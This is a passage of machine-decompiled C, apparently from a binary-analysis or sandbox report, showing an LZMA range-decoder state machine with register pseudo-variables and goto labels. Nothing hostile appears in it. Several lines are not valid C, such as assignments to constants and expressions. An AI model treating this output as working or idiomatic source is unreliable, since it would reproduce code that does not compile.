                                                  											 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
                                                  											 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
                                                  											_t45 = _t613 - 0x48;
                                                  											 *_t45 =  *(_t613 - 0x48) + 1;
                                                  											__eflags =  *_t45;
                                                  											L15:
                                                  											if( *(_t613 - 0x48) < 4) {
                                                  												goto L13;
                                                  											}
                                                  											_t546 =  *(_t613 - 0x40);
                                                  											if(_t546 ==  *(_t613 - 0x74)) {
                                                  												L20:
                                                  												 *(_t613 - 0x48) = 5;
                                                  												 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
                                                  												goto L23;
                                                  											}
                                                  											 *(_t613 - 0x74) = _t546;
                                                  											if( *(_t613 - 8) != 0) {
                                                  												GlobalFree( *(_t613 - 8));
                                                  											}
                                                  											_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
                                                  											 *(_t613 - 8) = _t534;
                                                  											if(_t534 == 0) {
                                                  												goto L171;
                                                  											} else {
                                                  												goto L20;
                                                  											}
                                                  										case 2:
                                                  											L24:
                                                  											_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
                                                  											 *(_t613 - 0x84) = 6;
                                                  											 *(_t613 - 0x4c) = _t553;
                                                  											_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
                                                  											 *(_t613 - 0x54) = _t606;
                                                  											goto L133;
                                                  										case 3:
                                                  											L21:
                                                  											__eflags =  *(_t613 - 0x6c);
                                                  											if( *(_t613 - 0x6c) == 0) {
                                                  												 *(_t613 - 0x88) = 3;
                                                  												goto L170;
                                                  											}
                                                  											 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
                                                  											_t67 = _t613 - 0x70;
                                                  											 *_t67 =  &(( *(_t613 - 0x70))[1]);
                                                  											__eflags =  *_t67;
                                                  											 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
                                                  											L23:
                                                  											 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
                                                  											if( *(_t613 - 0x48) != 0) {
                                                  												goto L21;
                                                  											}
                                                  											goto L24;
                                                  										case 4:
                                                  											L133:
                                                  											_t531 =  *_t606;
                                                  											_t589 = _t531 & 0x0000ffff;
                                                  											_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
                                                  											if( *(_t613 - 0xc) >= _t565) {
                                                  												 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
                                                  												 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
                                                  												 *(_t613 - 0x40) = 1;
                                                  												_t532 = _t531 - (_t531 >> 5);
                                                  												 *_t606 = _t532;
                                                  											} else {
                                                  												 *(_t613 - 0x10) = _t565;
                                                  												 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
                                                  												 *_t606 = (0x800 - _t589 >> 5) + _t531;
                                                  											}
                                                  											if( *(_t613 - 0x10) >= 0x1000000) {
                                                  												goto L139;
                                                  											}
                                                  										case 5:
                                                  											goto L137;
                                                  										case 6:
                                                  											__edx = 0;
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x34) = 1;
                                                  												 *(__ebp - 0x84) = 7;
                                                  												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x5c) & 0x000000ff;
                                                  											__esi =  *(__ebp - 0x60);
                                                  											__cl = 8;
                                                  											__cl = 8 -  *(__ebp - 0x3c);
                                                  											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                                                  											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                                                  											__ecx =  *(__ebp - 0x3c);
                                                  											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                                                  											__ecx =  *(__ebp - 4);
                                                  											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                                                  											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                                                  											__eflags =  *(__ebp - 0x38) - 4;
                                                  											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                                                  											if( *(__ebp - 0x38) >= 4) {
                                                  												__eflags =  *(__ebp - 0x38) - 0xa;
                                                  												if( *(__ebp - 0x38) >= 0xa) {
                                                  													_t98 = __ebp - 0x38;
                                                  													 *_t98 =  *(__ebp - 0x38) - 6;
                                                  													__eflags =  *_t98;
                                                  												} else {
                                                  													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                                                  												}
                                                  											} else {
                                                  												 *(__ebp - 0x38) = 0;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x34) - __edx;
                                                  											if( *(__ebp - 0x34) == __edx) {
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												goto L61;
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x14);
                                                  												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                  												__eflags = __eax -  *(__ebp - 0x74);
                                                  												if(__eax >=  *(__ebp - 0x74)) {
                                                  													__eax = __eax +  *(__ebp - 0x74);
                                                  													__eflags = __eax;
                                                  												}
                                                  												__ecx =  *(__ebp - 8);
                                                  												__ebx = 0;
                                                  												__ebx = 1;
                                                  												__al =  *((intOrPtr*)(__eax + __ecx));
                                                  												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                                                  												goto L41;
                                                  											}
                                                  										case 7:
                                                  											__eflags =  *(__ebp - 0x40) - 1;
                                                  											if( *(__ebp - 0x40) != 1) {
                                                  												__eax =  *(__ebp - 0x24);
                                                  												 *(__ebp - 0x80) = 0x16;
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x28);
                                                  												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  												__eax = 0;
                                                  												__eflags =  *(__ebp - 0x38) - 7;
                                                  												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  												__al = __al & 0x000000fd;
                                                  												__eax = (__eflags >= 0) - 1 + 0xa;
                                                  												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                                                  												__eax =  *(__ebp - 4);
                                                  												__eax =  *(__ebp - 4) + 0x664;
                                                  												__eflags = __eax;
                                                  												 *(__ebp - 0x58) = __eax;
                                                  												goto L69;
                                                  											}
                                                  											__eax =  *(__ebp - 4);
                                                  											__ecx =  *(__ebp - 0x38);
                                                  											 *(__ebp - 0x84) = 8;
                                                  											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                                                  											while(1) {
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											}
                                                  										case 8:
                                                  											goto L0;
                                                  										case 9:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												goto L89;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x60);
                                                  											if( *(__ebp - 0x60) == 0) {
                                                  												goto L171;
                                                  											}
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											_t258 =  *(__ebp - 0x38) - 7 >= 0;
                                                  											__eflags = _t258;
                                                  											0 | _t258 = _t258 + _t258 + 9;
                                                  											 *(__ebp - 0x38) = _t258 + _t258 + 9;
                                                  											goto L75;
                                                  										case 0xa:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 4);
                                                  												__ecx =  *(__ebp - 0x38);
                                                  												 *(__ebp - 0x84) = 0xb;
                                                  												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x28);
                                                  											goto L88;
                                                  										case 0xb:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__ecx =  *(__ebp - 0x24);
                                                  												__eax =  *(__ebp - 0x20);
                                                  												 *(__ebp - 0x20) =  *(__ebp - 0x24);
                                                  											} else {
                                                  												__eax =  *(__ebp - 0x24);
                                                  											}
                                                  											__ecx =  *(__ebp - 0x28);
                                                  											 *(__ebp - 0x24) =  *(__ebp - 0x28);
                                                  											L88:
                                                  											__ecx =  *(__ebp - 0x2c);
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                                                  											L89:
                                                  											__eax =  *(__ebp - 4);
                                                  											 *(__ebp - 0x80) = 0x15;
                                                  											__eax =  *(__ebp - 4) + 0xa68;
                                                  											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                                                  											goto L69;
                                                  										case 0xc:
                                                  											L99:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xc;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t334 = __ebp - 0x70;
                                                  											 *_t334 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t334;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											__eax =  *(__ebp - 0x2c);
                                                  											goto L101;
                                                  										case 0xd:
                                                  											L37:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xd;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t122 = __ebp - 0x70;
                                                  											 *_t122 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t122;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L39:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                                                  												goto L48;
                                                  											}
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												goto L54;
                                                  											}
                                                  											L41:
                                                  											__eax =  *(__ebp - 0x5b) & 0x000000ff;
                                                  											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                                                  											 *(__ebp - 0x48) = __eax;
                                                  											__eax = __eax + 1;
                                                  											__eax = __eax << 8;
                                                  											__eax = __eax + __ebx;
                                                  											__esi =  *(__ebp - 0x58) + __eax * 2;
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edx = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												 *(__ebp - 0x40) = 1;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												__ebx = __ebx + __ebx + 1;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edx;
                                                  												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L39;
                                                  											} else {
                                                  												goto L37;
                                                  											}
                                                  										case 0xe:
                                                  											L46:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xe;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t156 = __ebp - 0x70;
                                                  											 *_t156 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t156;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											while(1) {
                                                  												L48:
                                                  												__eflags = __ebx - 0x100;
                                                  												if(__ebx >= 0x100) {
                                                  													break;
                                                  												}
                                                  												__eax =  *(__ebp - 0x58);
                                                  												__edx = __ebx + __ebx;
                                                  												__ecx =  *(__ebp - 0x10);
                                                  												__esi = __edx + __eax;
                                                  												__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  												__ax =  *__esi;
                                                  												 *(__ebp - 0x54) = __esi;
                                                  												__edi = __ax & 0x0000ffff;
                                                  												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  												__eflags =  *(__ebp - 0xc) - __ecx;
                                                  												if( *(__ebp - 0xc) >= __ecx) {
                                                  													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  													__cx = __ax;
                                                  													_t170 = __edx + 1; // 0x1
                                                  													__ebx = _t170;
                                                  													__cx = __ax >> 5;
                                                  													__eflags = __eax;
                                                  													 *__esi = __ax;
                                                  												} else {
                                                  													 *(__ebp - 0x10) = __ecx;
                                                  													0x800 = 0x800 - __edi;
                                                  													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  													__ebx = __ebx + __ebx;
                                                  													 *__esi = __cx;
                                                  												}
                                                  												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												if( *(__ebp - 0x10) >= 0x1000000) {
                                                  													continue;
                                                  												} else {
                                                  													goto L46;
                                                  												}
                                                  											}
                                                  											L54:
                                                  											_t173 = __ebp - 0x34;
                                                  											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                                                  											__eflags =  *_t173;
                                                  											goto L55;
                                                  										case 0xf:
                                                  											L58:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0xf;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t203 = __ebp - 0x70;
                                                  											 *_t203 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t203;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L60:
                                                  											__eflags = __ebx - 0x100;
                                                  											if(__ebx >= 0x100) {
                                                  												L55:
                                                  												__al =  *(__ebp - 0x44);
                                                  												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                                                  												goto L56;
                                                  											}
                                                  											L61:
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__edx = __ebx + __ebx;
                                                  											__ecx =  *(__ebp - 0x10);
                                                  											__esi = __edx + __eax;
                                                  											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                  											__ax =  *__esi;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												_t217 = __edx + 1; // 0x1
                                                  												__ebx = _t217;
                                                  												__cx = __ax >> 5;
                                                  												__eflags = __eax;
                                                  												 *__esi = __ax;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												__ebx = __ebx + __ebx;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											 *(__ebp - 0x44) = __ebx;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L60;
                                                  											} else {
                                                  												goto L58;
                                                  											}
                                                  										case 0x10:
                                                  											L109:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x10;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t365 = __ebp - 0x70;
                                                  											 *_t365 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t365;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											goto L111;
                                                  										case 0x11:
                                                  											L69:
                                                  											__esi =  *(__ebp - 0x58);
                                                  											 *(__ebp - 0x84) = 0x12;
                                                  											while(1) {
                                                  												 *(_t613 - 0x54) = _t606;
                                                  												goto L133;
                                                  											}
                                                  										case 0x12:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												__eax =  *(__ebp - 0x58);
                                                  												 *(__ebp - 0x84) = 0x13;
                                                  												__esi =  *(__ebp - 0x58) + 2;
                                                  												while(1) {
                                                  													 *(_t613 - 0x54) = _t606;
                                                  													goto L133;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											__eflags = __eax;
                                                  											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                  											goto L130;
                                                  										case 0x13:
                                                  											__eflags =  *(__ebp - 0x40);
                                                  											if( *(__ebp - 0x40) != 0) {
                                                  												_t469 = __ebp - 0x58;
                                                  												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                  												__eflags =  *_t469;
                                                  												 *(__ebp - 0x30) = 0x10;
                                                  												 *(__ebp - 0x40) = 8;
                                                  												L144:
                                                  												 *(__ebp - 0x7c) = 0x14;
                                                  												goto L145;
                                                  											}
                                                  											__eax =  *(__ebp - 0x4c);
                                                  											__ecx =  *(__ebp - 0x58);
                                                  											__eax =  *(__ebp - 0x4c) << 4;
                                                  											 *(__ebp - 0x30) = 8;
                                                  											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                  											L130:
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											 *(__ebp - 0x40) = 3;
                                                  											goto L144;
                                                  										case 0x14:
                                                  											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                  											__eax =  *(__ebp - 0x80);
                                                  											 *(_t613 - 0x88) = _t533;
                                                  											goto L1;
                                                  										case 0x15:
                                                  											__eax = 0;
                                                  											__eflags =  *(__ebp - 0x38) - 7;
                                                  											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                  											__al = __al & 0x000000fd;
                                                  											__eax = (__eflags >= 0) - 1 + 0xb;
                                                  											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                  											goto L120;
                                                  										case 0x16:
                                                  											__eax =  *(__ebp - 0x30);
                                                  											__eflags = __eax - 4;
                                                  											if(__eax >= 4) {
                                                  												_push(3);
                                                  												_pop(__eax);
                                                  											}
                                                  											__ecx =  *(__ebp - 4);
                                                  											 *(__ebp - 0x40) = 6;
                                                  											__eax = __eax << 7;
                                                  											 *(__ebp - 0x7c) = 0x19;
                                                  											 *(__ebp - 0x58) = __eax;
                                                  											goto L145;
                                                  										case 0x17:
                                                  											L145:
                                                  											__eax =  *(__ebp - 0x40);
                                                  											 *(__ebp - 0x50) = 1;
                                                  											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                  											goto L149;
                                                  										case 0x18:
                                                  											L146:
                                                  											__eflags =  *(__ebp - 0x6c);
                                                  											if( *(__ebp - 0x6c) == 0) {
                                                  												 *(__ebp - 0x88) = 0x18;
                                                  												goto L170;
                                                  											}
                                                  											__ecx =  *(__ebp - 0x70);
                                                  											__eax =  *(__ebp - 0xc);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                  											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                  											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											_t484 = __ebp - 0x70;
                                                  											 *_t484 =  *(__ebp - 0x70) + 1;
                                                  											__eflags =  *_t484;
                                                  											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                  											L148:
                                                  											_t487 = __ebp - 0x48;
                                                  											 *_t487 =  *(__ebp - 0x48) - 1;
                                                  											__eflags =  *_t487;
                                                  											L149:
                                                  											__eflags =  *(__ebp - 0x48);
                                                  											if( *(__ebp - 0x48) <= 0) {
                                                  												__ecx =  *(__ebp - 0x40);
                                                  												__ebx =  *(__ebp - 0x50);
                                                  												0 = 1;
                                                  												__eax = 1 << __cl;
                                                  												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                  												__eax =  *(__ebp - 0x7c);
                                                  												 *(__ebp - 0x44) = __ebx;
                                                  												while(1) {
                                                  													 *(_t613 - 0x88) = _t533;
                                                  													goto L1;
                                                  												}
                                                  											}
                                                  											__eax =  *(__ebp - 0x50);
                                                  											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                  											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                  											__eax =  *(__ebp - 0x58);
                                                  											__esi = __edx + __eax;
                                                  											 *(__ebp - 0x54) = __esi;
                                                  											__ax =  *__esi;
                                                  											__edi = __ax & 0x0000ffff;
                                                  											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                  											__eflags =  *(__ebp - 0xc) - __ecx;
                                                  											if( *(__ebp - 0xc) >= __ecx) {
                                                  												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                  												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                  												__cx = __ax;
                                                  												__cx = __ax >> 5;
                                                  												__eax = __eax - __ecx;
                                                  												__edx = __edx + 1;
                                                  												__eflags = __edx;
                                                  												 *__esi = __ax;
                                                  												 *(__ebp - 0x50) = __edx;
                                                  											} else {
                                                  												 *(__ebp - 0x10) = __ecx;
                                                  												0x800 = 0x800 - __edi;
                                                  												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                  												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                  												 *__esi = __cx;
                                                  											}
                                                  											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                  											if( *(__ebp - 0x10) >= 0x1000000) {
                                                  												goto L148;
                                                  											} else {
                                                  												goto L146;
                                                  											}
                                                  										case 0x19:
                                                  											__eflags = __ebx - 4;
                                                  											if(__ebx < 4) {
                                                  												 *(__ebp - 0x2c) = __ebx;
                                                  												L119:
                                                  												_t393 = __ebp - 0x2c;
                                                  												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                  												__eflags =  *_t393;
                                                  												L120:
                                                  												__eax =  *(__ebp - 0x2c);
                                                  												__eflags = __eax;
                                                  												if(__eax == 0) {
                                                  													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                  													goto L170;
                                                  												}
                                                  												__eflags = __eax -  *(__ebp - 0x60);
                                                  												if(__eax >  *(__ebp - 0x60)) {
                                                  													goto L171;
                                                  												}
                                                  												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                  												__eax =  *(__ebp - 0x30);
                                                  												_t400 = __ebp - 0x60;
                                                  												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                  												__eflags =  *_t400;
                                                  												goto L123;
                                                  											}
                                                  											__ecx = __ebx;
                                                  											__eax = __ebx;
                                                  											__ecx = __ebx >> 1;
                                                  											__eax = __ebx & 0x00000001;
                                                  											__ecx = (__ebx >> 1) - 1;
                                                  											__al = __al | 0x00000002;
                                                  											__eax = (__ebx & 0x00000001) << __cl;
                                                  											__eflags = __ebx - 0xe;
                                                  											 *(__ebp - 0x2c) = __eax;
                                                  											if(__ebx >= 0xe) {
                                                  												__ebx = 0;
                                                  												 *(__ebp - 0x48) = __ecx;
                                                  												L102:
                                                  												__eflags =  *(__ebp - 0x48);
                                                  												if( *(__ebp - 0x48) <= 0) {
                                                  													__eax = __eax + __ebx;
                                                  													 *(__ebp - 0x40) = 4;
                                                  													 *(__ebp - 0x2c) = __eax;
                                                  													__eax =  *(__ebp - 4);
                                                  													__eax =  *(__ebp - 4) + 0x644;
                                                  													__eflags = __eax;
                                                  													L108:
                                                  													__ebx = 0;
                                                  													 *(__ebp - 0x58) = __eax;
                                                  													 *(__ebp - 0x50) = 1;
                                                  													 *(__ebp - 0x44) = 0;
                                                  													 *(__ebp - 0x48) = 0;
                                                  													L112:
                                                  													__eax =  *(__ebp - 0x40);
                                                  													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                  													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                  														_t391 = __ebp - 0x2c;
